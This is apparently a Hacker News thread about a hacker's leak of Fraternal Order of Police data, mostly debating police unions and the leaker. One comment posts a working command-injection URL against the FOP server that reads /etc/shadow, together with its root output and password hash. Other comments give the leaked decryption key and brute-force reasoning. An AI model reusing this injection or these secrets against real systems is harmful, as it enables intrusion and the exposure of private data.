
Fraternal Order of Police Data Dump - hendi_
https://fop.thecthulhu.com/
======
malchow
Speaking as a taxpayer, it does not seem to me at all clear why collective
bargaining agreements between public servants and city governments should be
able to be private documents at all. We pay the bills, after all.

~~~
eplanit
I agree. Collective bargaining for public workers is overall absurd, IMHO. It
injects a layer (the union) between the voters/citizens and the public
employees. We don't get to elect/control the union or see their dealings? BS!

~~~
CPLX
So labor should just take whatever management and politicians feel like giving
them like obedient little servants? How has that worked out in the past? Do we
feel that the civil service is sufficiently isolated from rapidly changing
political pressures to ensure the rights of workers and to avoid the inherent
issues involved in political control of a large group of government workers?

~~~
rayiner
> So labor should just take whatever management and politicians feel like
> giving them like obedient little servants?

When you're the boss (which you are when it comes to public workers), that's
exactly what you want. Do you wish your cops were something other than
"obedient little servants?" Doesn't it seem like the whole problem with cops
in the U.S. is that they don't think they work for you?

~~~
toomuchtodo
I want all labor to be paid appropriately, cops included.

I _do not_ want them protected when they've violated the law, or are grossly
negligent in their duties.

Can't unions negotiate for fair wages while also throwing the bad apples to
the wolves?

~~~
protomyth
> Can't unions negotiate for fair wages while also throwing the bad apples to
> the wolves?

No, not really. Its the nature of the beast that unions need to protect all
their member. A noble goal with a noble origin, but it gets pretty perverted
in the extreme its been taken to. For example, school union members that are
no longer allowed to teach students but cannot be fired (search on cases in
both LA and NYC). You would think rationality would prevail but then you run
into the other problem.

Union membership totals determine power. More members, more money to lobby,
which gives you more influence. There is a reason the California Correctional
Peace Officers Association continues to advocate for laws that will put more
people in jail.

At this point, for government workers, we as a country would be much better
off without government worker's unions.

~~~
Symbiote
It's the nature of the beast that corporations exploit their staff. Or
something.

If you have extreme situations like this, something is badly wrong, but
removing all unions isn't the solution. Instead, add more: convince people to
join a more moderate union.

~~~
protomyth
> It's the nature of the beast that corporations exploit their staff. Or
> something.

I mentioned corporations not once, and this is about transparency in
government.

> If you have extreme situations like this, something is badly wrong, but
> removing all unions isn't the solution. Instead, add more: convince people
> to join a more moderate union.

I would contend that there is no such thing as a moderate union in this
situation. I would be curious if you had any history of "convince people to
join a more moderate union"? I am inclined to think rayiner is correct and no
incentive exists.

Beyond this, we are there employers and the people who pay their wages. An
organization interfering with transparency and accountability does not serve
the public good.

~~~
Symbiote
I assumed corporations were relevant as much of this discussion has been
saying unions should be banned for the public sector, implying that they're
acceptable in the private sector. It's also where unions started.

Anyway.

At my previous job, in the British public sector, there were three unions who
represented the staff, and I joined the one the others in my office had
joined. Initially, this was because I appreciated the support a union had
given someone in my family against a bad manager. Later, I stayed in the union
in support of those with much less skill than me — the union was campaigning
against "zero hours" contracts¹.

A year or two ago, the government imposed significant cuts. (Contrary to a lot
of posts in this thread, government budget for salaries isn't unlimited.) I
found out that my union seemed to be prolonging the negotiations
unnecessarily, by being needlessly difficult — submitting 1000-page documents
in the last hour of a 3-month consultation, for example, which had no more
content than a 5 page document on the first day. Most staff I spoke to were
more interested in knowing whether their job was ending, rather than hanging
on for an extra month's pay during negotiations. (We already had 1-3 month
notice periods.) I left the union, and didn't join another. Several colleagues
left, and joined the more reasonable union.

For another example, the RMT is the more extreme union representing London
Underground employees, ASLEF is more moderate (there are others, these are the
two biggest, and not all staff are in a union).

Quoting from [2], just as an example, "The RMT has attacked a fellow Tube
union for failing to call strike action as part of the ongoing Night Tube
dispute. The RMT accused ASLEF of being "happy" with alleged assurances that
London Underground (LU) would put forward new work rosters for drivers." And
just look at the language in the RMT newsletter "only resolute determination
will prevail...".

RMT goes on strike much more often, and make a lot of noise about it, but most
of the staff in that union are less essential (ticket checking, platform
staff, etc) and the trains keep on running. The train drivers generally belong
to ASLEF, which is still a powerful union, but rarely tries to defend drunk
drivers or similar.

[1] [https://en.wikipedia.org/wiki/Zero-
hour_contract#United_King...](https://en.wikipedia.org/wiki/Zero-
hour_contract#United_Kingdom)

[2] [http://www.ibtimes.co.uk/tube-strikes-rmt-attacks-train-
driv...](http://www.ibtimes.co.uk/tube-strikes-rmt-attacks-train-drivers-
union-aslef-over-night-tube-dispute-1516170)

------
ryanlol
Haven't dled the dump yet, but if it contains credentials some of them will
probably work at
[https://email.fop.net/postfixadmin/users/login.php](https://email.fop.net/postfixadmin/users/login.php)

cve-2012-0811 yo

Clearly it's no wonder that these guys got hacked.

See also:
[https://news.ycombinator.com/item?id=10990193](https://news.ycombinator.com/item?id=10990193)
[http://fop.net/servlet/util/util.jsp?cmd=id;uname+-a;cat+/et...](http://fop.net/servlet/util/util.jsp?cmd=id;uname+-a;cat+/etc/shadow&html=true&pass=secret)

    
    
      uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
      Linux data.fop.net 2.6.18-407.el5 #1 SMP Wed Nov 11 08:12:41 EST 2015 x86_64 x86_64 x86_64 GNU/Linux
      root:$1$04KmnGtM$V0naSp94MiVAQUpoBH.fI1:16828:0:99999:7:::

thanks to user thisisthepolice for the above ;)

Edit: I sure hope it wasn't someone from here that turned the server off.
That's, like, several felonies.

~~~
sarciszewski
That's illegal.

EDIT: In case the OP gets rm'd:

[https://archive.is/fyHfC](https://archive.is/fyHfC)

[https://web.archive.org/web/20160128190623/https://news.ycom...](https://web.archive.org/web/20160128190623/https://news.ycombinator.com/item?id=10989900)

[http://www.webcitation.org/6escqonB6](http://www.webcitation.org/6escqonB6)

~~~
ryanlol
Yeah possibly, but this SHOULD be illegal:

[http://www.fop.net/servlet/listing/news_article?user_id=-1&n...](http://www.fop.net/servlet/listing/news_article?user_id=-1&nocache=1765055&XSL=xsl_pages/members/member_news_listing.xsl)

Note the convenient "Admin Tools" button :)

~~~
sarciszewski
Wow what the fuck. Who programmed their website?

~~~
ryanlol
A time traveller.

(Just to clarify, from the past.)

~~~
sarciszewski
[http://www.fop.net/servlet/display/donation?XSL=xsl_pages/pu...](http://www.fop.net/servlet/display/donation?XSL=xsl_pages/public/foundation.xsl)

Yes hello, I'd like to donate with my credit card number over HTTP. Quick,
nobody tell PCI!

~~~
pc86
No it's okay it's a servlet.

------
pavel_lishin
> _Don 't bother with legal threats or trying to get UK law enforcement to
> seek revenge. This is me playing nice. If you want to go nuclear with me,
> feel free to do so, but trust me when I say you might want to think long and
> hard before you do._

> _I 'm not known for bluffing, and I know many more of your secrets. About
> 18TB all in all actually, all unpublished yet._

I wonder what's in the unpublished docs, and why they're remaining
unpublished.

~~~
PantaloonFlames
Who has time to go through 18TB of data? The guy probably hasn't even viewed
the data. Maybe it includes information from PC hard drives and he doesn't
want to just release it without review.

~~~
dev1n
A topic analysis using LDA would be pretty neat. It would take a really really
long time with 18TB of text but in general it would be pretty cool to get an
overall picture of what, generally, is in those docs. For those parties who
are interested. Generally speaking of course..

------
sarciszewski
In case the main story goes down, here are several mirrors:

[https://web.archive.org/web/20160128183444/https://fop.thect...](https://web.archive.org/web/20160128183444/https://fop.thecthulhu.com/)

[http://www.webcitation.org/6esai2UHY](http://www.webcitation.org/6esai2UHY)

[https://archive.is/https://fop.thecthulhu.com/](https://archive.is/https://fop.thecthulhu.com/)

------
chippy
Ten days ago he was in custody and released by the UK police (and Intelligence
folks)

[https://www.thecthulhu.com/insurance-
release/](https://www.thecthulhu.com/insurance-release/)

Why? Possibly due to his release of his "insurance" dump - a dump containing
unknown stuff.

Why release this bigger archive after then? No idea but I'm not touching
either with any type of stick!

~~~
pjc50
Do we have any third-party reports on what happened there?

------
travjones
Wow. This is going to be interesting... The page even includes the key to
decrypt the encrypted fields in the dump. Is pg_crypto that easy to crack, or
is it more likely the key was stored somewhere in plaintext (e.g., email, pdf,
etc.)?

~~~
infogulch
The key is "Nipper47". Only 8 characters in the standard "short english-ish
word starting with a capital letter followed by a couple numbers"-pattern. I'd
say it's less that pg_crypto is easy to crack, and more that the key is
trivially insecure and easy to brute-force. But sibling is probably right that
it was just sitting there.

~~~
_asdf_asdf
8 chars, including numeric, uppercase and lowercase...

With sufficient GPU resources (being in possession of a working rig, cloud-
based or standalone and air-gapped, all powered-up and running operable
software) and talent (experience, and familiarity with an existing framework
and an established code base), I'm thinking one person could brute force that,
in the privacy of their own home, in a trivial amount of time.

~~~
infogulch
> one person could brute force that, in the privacy of their own home, in a
> trivial amount of time.

Yes. And that's assuming your pattern (26+26+10)^8 ~ 2e14, but the basic
character pattern here is 26 * 26^5 * 10^2 ~ 3e10, almost 10000 times weaker.
This is an extremely common pattern, most passwords don't follow a uniform
distribution of those "numeric, uppercase and lowercase" characters.

~~~
ikeboy
Or if nipper is in your dictionary (likely, there's a wikipedia page with that
title and there's only a handful of million articles, trivial to add every
title, or even every word), then assuming a dictionary of 10 million words,
the pattern is 2 _e7_ 10*10, another order of magnitude reduction.

------
apo
Anyone care to give a summary of what the data dump contains?

~~~
dmix
I haven't downloaded it yet but it seems to be email and server(?) dumps from
the FOP website.

FOP = Fraternal Order of Police

[https://en.wikipedia.org/wiki/Fraternal_Order_of_Police](https://en.wikipedia.org/wiki/Fraternal_Order_of_Police)

Additionally, the hacker made a Q/A-style blog post which will answer your
questions:

[https://www.thecthulhu.com/fraternal-order-of-police-data-
du...](https://www.thecthulhu.com/fraternal-order-of-police-data-dump/)

------
colinbartlett
Is there any background here or are there any summaries of what is contained
in the documents?

~~~
rfrank
Don't have any background, but from what I've seen so far (a small handful of
the tons of docs) it's collective bargaining agreements between various police
unions and the cities they operate in. Haven't seen one more recent than 2012.

~~~
samstave
Search for "stingray" and "body cameras" in all docs please.

~~~
cmurf
drone money drugs swimming pool lawsuit lawyer illegal destroy ruin idiot
river tax fbi atf cia nsa irs

Lots of words to search for.

~~~
samstave
Sure,

But currently Stingray and Body Cameras are the two biggest contentious
technology issues with police at the moment.

Police in Chicago were caught destroying cameras and mics to avoid audio
recording and reporting.

Stingrays are seemingly getting reported weekly.

So, I think they are a good focus.

But - make a word cloud and see whats largest.

~~~
bpchaps
Been looking through it for a bit - found pretty much no mention in here
except for a few vague legalese.

Found this gem, though: Would you send me the AVL info. Our Chief has
indicated to us, not only can he track our locations from his home computer
and Blackberry using AVL, but can access the on board camera system as well.
This includes the ONLY interior car camera that ONLY monitors the driver.
That's right, it doesn't monitor the criminal in the back seat, just the
driver. He says this can only be done when the system is active such as on a
car stop. I am not aware of any incident in which he has done this.\r\n\r\nHe
has also installed cameras in the station that only target the receptionst in
the enclosed office and the squad room where officers do their paperwork. On
occassion he has called the night dispatcher and commented on what she was
having for dinner and called the station to comment that he can see officers
talking and not typing. BIG BROTHER IS WATCHING.\r\n\r\nI understand these
cameras have been placed for "security" purposes. The building is posted to
inform people that video monitoring is in use. Is there a limit to their use?
Re:Contract language covering use of AVL for discipline

~~~
cdcarter
That gem sounds like a union member asking his representative about
overreaching power of management for a purpose not traditionally thought of as
why cops need cams, so...checks out to me.

------
ihsw
We should expect the FBI to become involved if there is any credence to this,
and the domain name thecthulhu.com (Namecheap with WhoisGuard) should be taken
down shortly.

Heads will roll, that much is certain.

Does anyone have a file listing for this? Is it just a PGDATA dump, or are
there more interesting things?

~~~
she11c0de
> Does anyone have a file listing for this? Is it just a PGDATA dump, or are
> there more interesting things?

[http://pastebin.com/CZXikytZ](http://pastebin.com/CZXikytZ)

~~~
brador
> ├── GrandLodge_DB_backup.tar

Don't the Freemasons call their clubhouse a Grand Lodge?

~~~
fnordfnordfnord
More than one group uses that varnacular, but yeah that's a good context clue.
Freemasonry is frequently popular among law enforcement types.

------
anigbrowl
Thanks for this! I hate the FOP with a passion - it's a RICO as far as I'm
concerned and I look forward to the day when its leaders are rotting in jail
cells.

------
Dan_JiuJitsu
Without espousing an opinion one way or the other, I think the point that is
most striking to me is the relatively civilized manner we're all discussing a
contentious topic. Hat's off to hackernews readers for navigating tough issues
with class!

------
mangeletti
I was JUST solicited by phone on the day before yesterday, by our local FOP in
Jupiter, FL.

Let me tell you how that went (I'll call the caller Albert, to avoid using his
real name):

Albert: Hi, <my full name>. This is Albert from the Jupiter Police
Department...

Me: Hi (...shit, did I cut somebody off and they called the cops?).

Albert: _[nothing for 3 seconds while I ruminate in my paranoia]_

Albert: Don't worry, there's nothing wrong. I'm calling about officers in
need. I'm from the Fraternal Order of Police... Each year we... yata yata...
we help officers that have been injured on the job and officers whose families
are in need... can you help us out?

Me: _[how does this guy know my mobile phone number and full name, anyway]_

Me: Possibly.

... some back and forth - him trying to convince me that the only amount that
can be accepted is $285. Me having patience, thinking about how, despite all
the police brutality reports out there, etc., there are also a lot of public
servants in need that are now doubly screwed by all the bad press, as a result
of the few that do bad things, also how the Jupiter Police Department has
always been really great compared to anywhere else I've lived... basically,
I'm sympathizing with the officers, rather than wondering what this FOP
organization is, and why they're being allowed to say they're calling FROM the
Jupiter Police Department.

Me: Ok, I'll donate $90.

... quick discussion about check / payable to, etc...

Albert: Ok, I've got you at <my address>. Is that correct?

Me: _[what, does the police department give him the address from my license?]_

Me: Yes.

Albert: Ok, I'll have our guy come pick up the check tomorrow.

The call basically ends there, but I'm left with this uncomfortable "well,
that guy seemed like a hustler to me" feeling. I do a quick search, pull up
their website, and immediately find that they offer legal services, etc.
Instantly, I'm thinking, "wait, I was just bamboozled into donating to a fund
that is probably used for lobbying / bargaining, and for protecting police
that are charged with murdering innocent people! I was donating to help
officers directly in need!". I called back and cancelled the donation.

Organizations like this are, sadly, basically large gangs, and they only serve
to ruin the establishments they "serve" by adding unnatural protections that
lead to corruption and abuse.

Note: My full name is on my profile page. I only mask it here, in case this
comment was, for some reason, copy/paste quoted on NYT or something
ridiculous.

~~~
uremog
Did you ever figure out how they know your address?

~~~
mangeletti
No, but I did register a business in FL last year, so it could very well have
been that.

------
geographomics
Seems rather impolite to be leaking all this data. Where's the benefit?

~~~
nitrogen
I think this is a fair question. From other comments it sounds like there are
union agreements that may not have been available before, and it can be argued
that the public should know what their governments have contracted with police
unions. Another item mentioned in other comments is what looks like a forum
database dump, so people could find out what the police say about various
subjects when they expect nobody to hear.

------
tyingq
Bookmarking this for future entertainment. I hope he got a dump of their
emails...that's probably where most of the interesting stuff is.

~~~
tyingq
If it's helpful, here's a good overview of why I'm experiencing Schadenfreude
over this:

[http://www.theatlantic.com/politics/archive/2014/12/how-
poli...](http://www.theatlantic.com/politics/archive/2014/12/how-police-
unions-keep-abusive-cops-on-the-street/383258/)

~~~
sbarre
Ugh I got about half way through that article and had to close the browser
because it made me so angry.

------
tiredofhtebs
This planet will be pulverized by an asteroid before this 18TB is released in
plain text for the entire world to freely peruse. The entire hacker/anonymous
phenomenon is a complete fraud run by western intelligence/police agencies
with the corporate media’s cooperation.

------
5ilv3r
Ah, so that's where they hid all that undisclosed evidence! Thanks, Ed!

------
geobmx540
I need more popcorn for this

------
jimrandomh
IMPORTANT: This is a collection of files from an anonymous hacker including
file formats such as docx that are known for carrying malware. Safe handling
means opening them only on a virtual machine with nothing of value inside it
and no access to your internal network. You have been warned.

~~~
ryanlol
Oh come on, we might as well start posting this warning every time someone
links to any files on HN.

In fact, websites are known for carrying malware.

Especially considering that at the point where you have the docs you have
already opened the torrent, and torrent clients are known for being _super
secure_

~~~
brazzledazzle
I don't think there's any harm in a warning for binary files distributed by
someone who presumably broke the law to get them.

~~~
ryanlol
Did I say there's any harm? I just think it's silly, especially considering
that binary content is constantly posted here.

~~~
brazzledazzle
Context matters.

~~~
ryanlol
And what makes the files in this context stand out as particularly dangerous?

I don't know what kind of attacks you work with but in my experience people
usually try to be at least somewhat stealthy, this wouldn't be it.

And anyway, how would you even get those files without downloading the torrent
in the first place? Sounds like you might be placing _a little_ unwarranted
trust on your torrent client.

------
godzillabrennus
Security is just an illusion.

~~~
SixSigma
"We will make it more secure"

no, you will make it less insecure.

------
Kristine1975
Every year a huge leak. 2015 it was HackingTeam, 2016 it seems to be the FOP.

